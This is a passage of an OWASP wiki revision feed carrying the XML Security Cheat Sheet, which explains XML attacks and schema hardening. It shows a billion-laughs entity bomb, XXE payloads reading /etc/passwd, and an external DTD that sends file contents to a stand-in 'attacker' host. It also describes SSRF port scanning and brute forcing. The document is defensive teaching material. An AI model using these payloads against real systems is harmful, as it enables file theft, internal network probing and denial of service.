  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224438</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224438"/>
				<updated>2016-12-21T20:25:49Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
